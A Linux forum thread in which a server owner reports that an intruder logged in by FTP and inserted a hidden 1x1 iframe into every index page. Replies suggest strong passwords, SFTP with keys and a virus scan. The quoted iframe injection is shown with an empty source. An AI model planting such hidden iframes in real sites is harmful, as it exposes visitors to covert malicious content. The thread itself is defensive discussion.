Find the answer to your Linux question:
Results 1 to 3 of 3
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1

    what is this hacker upto?

    Upon checking my logs of my server, I noticed a hacker ftp into my main account and edited all index.html and index.php to include the following

    <iframe src="" width="1" height="1" frameborder="0"></iframe>'; ?>
    i checked it against the server and it redirects to google home page. The funny part is the ip originates somewhere in ukraine

    What could this hacker be upto? I blocked his ip address and change the password of my account. But what other measures can I take?

    btw he's ip source is from

  2. #2
    Linux Guru coopstah13's Avatar
    Join Date
    Nov 2007
    NH, USA
    move your ftp server to a non default port would help discourage most script kiddies, but an nmap will show whats on any port anyways

    the best thing you can do is make sure your password is very strong, but you could also switch to using ssh/sftp only and use a public/private key authentication for even more security

  3. #3
    I had the same code planted in my index files, I don't know if it's harmfull because it just redirects to google.

    There's a virus going round and when it gets on your pc it searches for ftp logins, my ftp access logs show that that ip from russia was where they downloaded & uploaded the edited index files.

    You've done the right thing changing passes I done what "coopstah13" said and now use sftp.
    Try also doing a scan on your pc for viruses.


  4. $spacer_open

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts